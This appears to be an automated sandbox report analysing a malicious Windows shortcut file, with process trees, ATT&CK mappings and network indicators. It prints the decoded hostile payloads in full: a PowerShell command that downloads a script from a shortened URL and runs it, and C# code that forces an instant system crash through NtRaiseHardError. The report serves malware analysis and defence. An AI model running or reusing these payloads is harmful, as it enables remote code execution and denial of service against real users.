Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
Source: Windows PowerShell.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: :C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.pdb source: powershell.exe, 0000004B.00000002.2248209888.000002145EE74000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 75_2_00007FFD345700BD pushad ; iretd 75_2_00007FFD345700C1

Persistence and Installation Behavior

Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3863
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2223
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384 | Thread sleep count: 3399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496 | Thread sleep count: 2223 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: unknown | Process created: Base64 decoded iwr is.gd/jwr7JD -o $env:TMP/.cmd;& $env:TMP/.cmd
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $s='using System;using System.Text;using System.Security.Cryptography;using System.Runtime.InteropServices;using System.IO;public class X{[DllImport("ntdll.dll")]public static extern uint RtlAdjustPrivilege(int p,bool e,bool c,out bool o);[DllImport("ntdll.dll")]public static extern uint NtRaiseHardError(uint e,uint n,uint u,IntPtr p,uint v,out uint r);public static unsafe string Shot(){bool o;uint r;RtlAdjustPrivilege(19,true,false,out o);NtRaiseHardError(0xc0000022,0,0,IntPtr.Zero,6,out r);byte[]c=Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");using(Aes a=Aes.Create()){a.Key=k;a.IV=i;ICryptoTransform d=a.CreateDecryptor(a.Key,a.IV);using(var m=new MemoryStream(c))using(var y=new CryptoStream(m,d,CryptoStreamMode.Read))using(var s=new StreamReader(y)){return s.ReadToEnd();}}}}';$c=New-Object System.CodeDom.Compiler.CompilerParameters;$c.CompilerOptions='/unsafe';$a=Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c;if((Get-Random -Min 1 -Max 7) -eq 1){[X]::Shot()}Start-Process "powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 97
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 99
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 102
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 103
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 105
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 106
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 107
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 108
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 115
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 118
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 120
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 121
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 122
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 65
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 66
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 67
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 72
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 79
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 81
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 82
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 86
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 88
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 50
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 51
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 52
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 53
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 57
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 123
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 63
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 58
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 46
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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 to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e [base64 encoded command omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (techniques per tactic; the number in parentheses is the count shown in the report for techniques the analysis matched)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Spearphishing Link (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); PowerShell (2); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (11); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Process Discovery (11); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph
Behavior Graph ID: 1526392 | Sample: Windows PowerShell.lnk | Start date: 05/10/2024 | Architecture: WINDOWS | Score: 100
(Node numbers are the graph's own; the counts after a process name are the per-process counts defined in the legend above.)

Start node (2)
  • DNS/IP: objects.githubusercontent.com; is.gd; github.com
  • Signatures: Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands; 6 other signatures
  • Started: powershell.exe (node 10; counts 14, 20)

powershell.exe (node 10)
  • DNS/IP: github.com 140.82.121.4, ports 443, 49712, GITHUBUS, United States; objects.githubusercontent.com 185.199.111.133, ports 443, 49714, FASTLYUS, Netherlands; is.gd 104.25.234.53, ports 443, 49710, 49711, CLOUDFLARENETUS, United States
  • Dropped: C:\Users\user\AppData\Local\Temp\.cmd (Unicode)
  • Signatures: Windows shortcut file (LNK) starts blacklisted processes; Found suspicious powershell code related to unpacking or dynamic code loading
  • Started: cmd.exe (node 15; count 1); conhost.exe (node 18; count 1)

cmd.exe (node 15)
  • Signatures: Windows shortcut file (LNK) starts blacklisted processes; Malicious encrypted Powershell command line found; Encrypted powershell cmdline option found
  • Started: powershell.exe (node 20; count 22); cmd.exe (node 24; count 1); cmd.exe (node 26; count 1); 69 other processes (node 28)

powershell.exe (node 20)
  • Dropped: C:\Users\user\AppData\...\pbkjdvqy.cmdline (Unicode)
  • Signatures: Performs an instant shutdown (NtRaiseHardError)
  • Started: csc.exe (node 30; count 3)

csc.exe (node 30)
  • Dropped: C:\Users\user\AppData\Local\...\pbkjdvqy.dll (PE32)
  • Started: cvtres.exe (node 33; count 1)

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
Windows PowerShell.lnk | 14% | ReversingLabs | Binary.Trojan.Generic
Windows PowerShell.lnk | 19% | Virustotal |
Windows PowerShell.lnk | 100% | Joe Sandbox ML |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
github.com | 0% | Virustotal |
is.gd | 2% | Virustotal |
objects.githubusercontent.com | 1% | Virustotal |

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
http://is.gd/jwr7JD | 2% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://is.gd/jwr7JD | 2% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
https://github.com/user-attachments/files/17251016/powershell.zip | 0% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.4 | true | false | | unknown
is.gd | 104.25.234.53 | true | false | | unknown
objects.githubusercontent.com | 185.199.111.133 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://is.gd/jwr7JD | false | | unknown
https://github.com/user-attachments/files/17251016/powershell.zip | false | | unknown
https://is.gd/jwr7JD | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 0000004B.00000002.2248209888.000002145E474000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.org | powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.25.234.53 | is.gd | United States | 13335 | CLOUDFLARENETUS | false
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false
185.199.111.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1526392
Start date and time: 2024-10-05 14:50:36 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 78
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
